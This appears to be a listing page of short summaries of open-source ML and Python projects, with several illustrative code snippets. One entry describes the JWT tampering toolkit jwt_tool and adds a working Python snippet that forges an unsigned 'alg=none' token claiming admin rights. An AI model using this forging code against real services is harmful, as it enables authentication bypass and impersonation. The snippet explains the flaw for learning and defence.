Sequence to Sequence Framework in PyTorch

nmtpytorch This project is not actively maintained, so issues created are unlikely to be addressed in a timely way. If you are interested, there is a recent fork of this repository called pysimt which includes Transformer-based architectures as well. nmtpytorch allows training of various end-to-end neural architectures including but not limited to neural machine translation, image captioning and automatic speech recognition systems. The initial codebase was in Theano and was inspired by the famous dl4mt-tutorial codebase. nmtpytorch received valuable […]

Read more

An implementation of WaveNet with fast generation

pytorch-wavenet This is an implementation of the WaveNet architecture, as described in the original paper. Features Automatic creation of a dataset (training and validation/test set) from all sound files (.wav, .aiff, .mp3) in a directory Efficient multithreaded data loading Logging to TensorBoard (training loss, validation loss, validation accuracy, parameter and gradient histograms, generated samples) Fast generation, as introduced here Requirements python 3 pytorch 0.3 numpy […]

Read more

Pytorch implementation of Tacotron

Tacotron-pytorch A PyTorch implementation of Tacotron: A Fully End-to-End Text-To-Speech Synthesis Model. Data I used the LJSpeech dataset, which consists of pairs of text scripts and wav files. The complete dataset (13,100 pairs) can be downloaded here. I referred to https://github.com/keithito/tacotron for the preprocessing code. File description hyperparams.py includes all hyperparameters that are needed. data.py loads training data and preprocesses text to indices and wav files to spectrograms. Preprocessing code for text is in the text/ directory. module.py contains all methods, including […]

Read more
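The text-to-index step that data.py performs can be sketched in a few lines. The vocabulary and index scheme below are illustrative assumptions for this sketch, not the repository's actual symbol set:

```python
# Illustrative character-to-index preprocessing, similar in spirit to what
# data.py does before feeding text to the model. VOCAB is a hypothetical
# placeholder, not Tacotron-pytorch's actual symbol inventory.
VOCAB = "abcdefghijklmnopqrstuvwxyz ."
CHAR_TO_IDX = {ch: i + 1 for i, ch in enumerate(VOCAB)}  # 0 reserved for padding

def text_to_sequence(text):
    # Map each known character to an integer index, dropping unknown symbols
    return [CHAR_TO_IDX[ch] for ch in text.lower() if ch in CHAR_TO_IDX]

print(text_to_sequence("Hi."))  # [8, 9, 28]
```

The resulting integer sequences are what get padded and batched, while the paired wav files are converted to spectrogram targets.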

A deep learning nlp library inspired by the fast.ai library

Quick NLP Quick NLP is a deep learning NLP library inspired by the fast.ai library. It follows the same API as fastai and extends it, allowing for quick and easy running of NLP models. Features Python 3.6 code Tight-knit integration with the fast.ai library: fast.ai-style DataLoader objects for sentence-to-sentence algorithms fast.ai-style DataLoader objects for dialogue algorithms fast.ai-style DataModel objects for training NLP models Can run a seq2seq model with a few lines of code similar to […]

Read more

Neural speaker diarization with pyannote-audio

Neural speaker diarization with pyannote-audio Neural building blocks for speaker diarization: speech activity detection, speaker change detection, overlapped speech detection, speaker embedding. pyannote.audio is an open-source toolkit written in Python for speaker diarization. Based on the PyTorch machine learning framework, it provides a set of trainable end-to-end neural building blocks that can be combined and jointly optimized to build speaker diarization pipelines. pyannote.audio also comes with pretrained models covering a wide range of domains for voice activity detection, speaker change detection, […]

Read more

Learning General Purpose Distributed Sentence Representations via Large Scale Multi-task Learning

Learning General Purpose Distributed Sentence Representations via Large Scale Multi-task Learning Sandeep Subramanian, Adam Trischler, Yoshua Bengio & Christopher Pal ICLR 2018 About GenSen is a technique to learn general purpose, fixed-length representations of sentences via multi-task training. These representations are useful for transfer and low-resource learning. For details please refer to our ICLR paper. Code We provide a PyTorch implementation of our paper along with pre-trained models as well as code to evaluate these models on a variety of […]

Read more

ESPnet: end-to-end speech processing toolkit

ESPnet ESPnet is an end-to-end speech processing toolkit, mainly focusing on end-to-end speech recognition and end-to-end text-to-speech. ESPnet uses Chainer and PyTorch as its main deep learning engines, and also follows Kaldi-style data processing, feature extraction/format, and recipes to provide a complete setup for speech recognition and other speech processing experiments. Key Features Kaldi-style complete recipes Supports a number of ASR recipes (WSJ, Switchboard, CHiME-4/5, Librispeech, TED, CSJ, AMI, HKUST, Voxforge, REVERB, etc.) Supports a number of TTS recipes with […]

Read more

A toolkit for validating, forging, scanning and tampering JWTs

jwt_tool.py is a toolkit for validating, forging, scanning and tampering with JWTs (JSON Web Tokens). Its functionality includes: Checking the validity of a token Testing for known exploits: (CVE-2015-2951) The alg=none signature-bypass vulnerability (CVE-2016-10555) The RS/HS256 public key mismatch vulnerability (CVE-2018-0114) Key injection vulnerability (CVE-2019-20933/CVE-2020-28637) Blank password vulnerability (CVE-2020-28042) Null signature vulnerability Scanning for misconfigurations or known weaknesses Fuzzing claim values to provoke unexpected behaviours Testing the validity of a secret/key file/Public Key/JWKS key Identifying weak keys via a High-speed Dictionary […]

Read more
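The alg=none signature bypass (CVE-2015-2951) that jwt_tool tests for can be demonstrated with standard-library Python alone. This is a sketch of the vulnerability itself, not jwt_tool's implementation:

```python
import base64
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url-encoded segments
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_alg_none(payload: dict) -> str:
    # CVE-2015-2951: libraries that honour alg="none" skip signature
    # verification entirely, so an attacker can forge arbitrary claims
    header = {"alg": "none", "typ": "JWT"}
    return ".".join([
        b64url(json.dumps(header).encode()),
        b64url(json.dumps(payload).encode()),
        "",  # empty signature segment
    ])

token = forge_alg_none({"user": "admin"})
print(token)
```

A vulnerable verifier accepts this token as valid despite the empty signature; a correctly configured one rejects any token whose algorithm is not on an explicit allow-list.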

Identifying The Language of A Document Using NLP!

This article was published as part of the Data Science Blogathon. Introduction The goal of this article is to identify the language of written text. The text in documents is available in many languages, and when we don't know the language it can be difficult even to tell Google Translate what it is. Most translators require us to specify both the input language and the desired output language. If you had a text written in Spanish and you […]

Read more
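The core idea of language identification can be sketched with a deliberately minimal stopword-overlap heuristic. This is an illustrative toy, not the article's method; real projects would use a library such as langdetect or a fastText model:

```python
# Toy language guesser: score each language by how many of its common
# stopwords appear in the text. The tiny stopword sets are assumptions
# for illustration only.
STOPWORDS = {
    "english": {"the", "and", "is", "in", "to", "of"},
    "spanish": {"el", "la", "y", "es", "en", "de"},
    "french": {"le", "et", "est", "dans", "un", "une"},
}

def guess_language(text):
    words = set(text.lower().split())
    # Pick the language whose stopword set overlaps the text the most
    return max(STOPWORDS, key=lambda lang: len(words & STOPWORDS[lang]))

print(guess_language("el gato es negro y la casa es grande"))  # spanish
```

Even this crude approach illustrates why detection works at all: function words are frequent and highly language-specific, which is also what makes character n-gram models so effective.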

NumPy views: saving memory, leaking memory, and subtle bugs

If you’re using Python’s NumPy library, it’s usually because you’re processing large arrays that use plenty of memory. To reduce your memory usage, chances are you want to minimize unnecessary copying. NumPy has a built-in feature that does this transparently in many common cases: memory views. However, this feature can also cause higher memory usage by preventing arrays from being garbage collected. And in some cases it can cause bugs, with data being mutated in unexpected ways. To avoid these […]

Read more
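The view-versus-copy behaviour described above is easy to check directly; a small sketch, assuming NumPy is installed:

```python
import numpy as np

big = np.arange(1_000_000, dtype=np.float64)

view = big[:10]          # basic slicing returns a view: no data is copied
copy = big[:10].copy()   # .copy() allocates fresh memory

assert np.shares_memory(big, view)
assert not np.shares_memory(big, copy)

view[0] = -1.0           # writing through the view mutates the base array
assert big[0] == -1.0

# The view's .base references the full million-element array, so holding
# only `view` still prevents `big`'s buffer from being garbage collected
assert view.base is big
```

This is both the memory-saving feature (no copy on slicing) and the leak/bug hazard (shared mutation, and a tiny view pinning a huge buffer) in one example.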